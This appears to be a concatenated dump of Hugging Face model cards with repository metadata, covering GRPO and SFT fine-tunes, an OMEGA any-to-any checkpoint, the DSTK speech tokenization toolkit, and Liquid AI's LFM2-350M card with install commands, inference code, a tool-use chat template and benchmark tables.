This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.20.0
- Transformers: 4.56.1
- Pytorch: 2.8.0+cu126
- Datasets: 4.1.1
- Tokenizers: 0.22.0
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
maximedb/Llama-3-70B-Instruct-twentle-messages-sft-hybrid
|
maximedb
| 2025-09-23T14:51:15Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:meta-llama/Llama-3.1-8B-Instruct",
"base_model:finetune:meta-llama/Llama-3.1-8B-Instruct",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T14:51:08Z |
---
base_model: meta-llama/Llama-3.1-8B-Instruct
library_name: transformers
model_name: Llama-3-70B-Instruct-twentle-messages-sft-hybrid
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for Llama-3-70B-Instruct-twentle-messages-sft-hybrid
This model is a fine-tuned version of [meta-llama/Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="maximedb/Llama-3-70B-Instruct-twentle-messages-sft-hybrid", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.4.1+cu124
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
thefirstgoku/23SEP_inter_v32_1
|
thefirstgoku
| 2025-09-23T14:50:53Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T14:49:35Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
DiscreteSpeech/DSTK
|
DiscreteSpeech
| 2025-09-23T14:50:38Z | 0 | 1 | null |
[
"en",
"zh",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T03:16:00Z |
---
license: apache-2.0
language:
- en
- zh
---
> We choose to go to the moon, not because it is easy, but because it is hard.
# Discrete Speech Tokenization Toolkit [[English](README.md)|[Chinese](README_CN.md)]
The Discrete Speech Tokenization Toolkit (DSTK) is an open-source speech processing toolkit designed to provide a complete solution for speech discretization. It supports converting continuous speech signals into discrete speech tokens, reconstructing speech waveforms from discrete speech tokens, and converting text content into speech tokens. DSTK offers efficient, flexible, and modular foundational components for tasks such as speech understanding, speech synthesis, and multimodal learning.
## Release Notes:
V1.0
This release of DSTK includes three modules:
1. Semantic Tokenizer
- Encode the semantic information of speech into discrete speech tokens.
- Frame rate: 25 Hz; codebook size: 4096; supports both Chinese and English.
2. Semantic Detokenizer
- Decode discrete speech tokens into audible speech waveforms to reconstruct the speech.
- Supports both Chinese and English.
3. Text2token (T2U)
- Convert text content into speech tokens.
## TTS pipeline
As shown in the figure below, the three modules can be chained into a pipeline for the TTS task.
<p align="center"><img src="figs/TTS.jpg" width="1200"></p>
## Non-parallel Speech Reconstruction Pipeline
As shown in the figure below, the tokenizer and detokenizer can also form a pipeline for the speech reconstruction task.
<p align="center"><img src="figs/reconstruction.jpg" width="1200"></p>
These pipelines achieved top-tier performance on TTS and speech reconstruction on the seed-tts-eval dataset:
<p align="center"><img src="figs/eval1.jpg" width="1200"></p>
<p align="center"><img src="figs/eval2.jpg" width="1200"></p>
We also evaluated the ASR performance of our semantic tokenizer using an LLM as the backbone. Our model achieves performance comparable to models that use continuous speech representations.
<p align="center"><img src="figs/eval3.jpg" width="1200"></p>
## More details about the three modules:
- [Semantic Tokenizer](semantic_tokenizer/f40ms/README.md)
- [Semantic Detokenizer](semantic_detokenizer/README.md)
- [Text2Token](text2token/README.md)
## Installation
### Create a separate environment if needed
```bash
# Create a conda env with python_version>=3.10 (you could also use virtualenv)
conda create -n dstk python=3.10
conda activate dstk
```
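The module READMEs linked above document the actual APIs; as a purely illustrative sketch of how the two pipelines fit together (all identifiers below are hypothetical, not the real DSTK interface):

```python
# Hypothetical sketch only -- the names here are illustrative,
# not the actual DSTK API; see the module READMEs for real usage.

def tts(text, t2u, detokenizer):
    tokens = t2u.encode(text)            # Text2Token: text -> discrete speech tokens
    return detokenizer.decode(tokens)    # Detokenizer: tokens -> waveform

def reconstruct(waveform, tokenizer, detokenizer):
    tokens = tokenizer.encode(waveform)  # Tokenizer: speech -> 25 Hz tokens (codebook 4096)
    return detokenizer.decode(tokens)    # Detokenizer: tokens -> reconstructed speech
```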
## More tools to be released:
- 12.5Hz Streaming Semantic Tokenizer and Detokenizer
- Speech Normalized Tokenizer
- Speech Disentangled Tokenizer
## Core Developers:
[Daxin Tan]([email protected]), [Dehua Tao]([email protected]), [Yusen Sun]([email protected]) and [Xiao Chen]([email protected])
## Contributors:
[Hanlin Zhang]([email protected])
## Former Contributors:
Jingcheng Tian, Xinshan Zeng, Liangyou Li, Jing Xu, Mingyu Cui, Dingdong Wang
|
LiquidAI/LFM2-350M
|
LiquidAI
| 2025-09-23T14:49:28Z | 14,279 | 129 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:24Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-350M
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6B parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt.
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use:
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
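If the installed version of transformers supports the `tools` argument of `apply_chat_template` for this model's chat template (an assumption worth verifying), the tool list can be rendered from a plain Python function instead of hand-writing the special tokens:

```python
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("LiquidAI/LFM2-350M")

def get_candidate_status(candidate_id: str):
    """Retrieves the current status of a candidate in the recruitment process.

    Args:
        candidate_id: Unique identifier for the candidate.
    """
    ...

prompt = tokenizer.apply_chat_template(
    [{"role": "user", "content": "What is the current status of candidate ID 12345?"}],
    tools=[get_candidate_status],
    add_generation_prompt=True,
    tokenize=False,
)
print(prompt)  # should contain the <|tool_list_start|>...<|tool_list_end|> block
```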
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-350M"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-350M")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-350M-GGUF). Find more information in the model card.
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
LiquidAI/LFM2-1.2B
|
LiquidAI
| 2025-09-23T14:49:12Z | 31,961 | 294 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:50Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
